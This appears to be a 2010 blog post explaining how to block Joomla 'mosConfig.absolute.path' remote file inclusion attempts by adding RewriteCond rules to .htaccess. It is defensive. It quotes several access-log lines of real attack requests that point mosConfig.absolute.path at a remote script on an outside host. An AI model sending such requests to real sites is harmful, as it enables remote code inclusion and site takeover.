Block mosConfig.absolute.path attack

Published on| May 10th, 2010 | No Comment.

Categories:Preferences |

Did you disable Javascript with your web browser ?
If you disabled it, you will not be able to see any letters of content, or you will not be able to search this site, or you will not be able to send comment.

Recently, I have seen "confirm mosConfig.absolute.path attack" on my site by Joomla!.
Then, I felt the necessity for taking some measures.
So this post might help you that have same problem.

Edit .htaccess

This post will explain how to block the attack by an easy .htaccess edit.

# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

You will find the sentence like the above-mentioned to the htaccess file. You will add the following lines under above-line.

RewriteCond %{QUERY_STRING} .*mosConfig.* [OR]
RewriteCond %{QUERY_STRING} .*mosconfig.* [OR]
RewriteCond %{QUERY_STRING} .*http:.* [OR]

It is very easy. But you should note at 3 line.
This line means the error is displayed when the character string "http:" is included in the parameter of URL.
You should become careful a plug-in parameter etc.

And, you should confirm the access log. If you were able to find the following access logs, your site might be attacked.

118.220.174.89 - - [27/Apr/2010:02:38:33 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41813 "-" "Mozilla/5.0"
118.220.174.89 - - [27/Apr/2010:02:38:34 +0900] "GET /?option=com_content&view=...40:extemtions&directory=1%20%20//index.php?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 42653 "-" "Mozilla/5.0"
118.220.174.89 - - [27/Apr/2010:02:38:34 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41813 "-" "Mozilla/5.0"
118.220.174.89 - - [27/Apr/2010:02:38:35 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41811 "-" "Mozilla/5.0"

Comments

Site Description

This site is support & information site of WEB,and Software. This site might help you that create software or Web Site…perhaps?[:]

Block mosConfig.absolute.path attack

You might also like:

Comments

Recent Posts

Contents

Site Description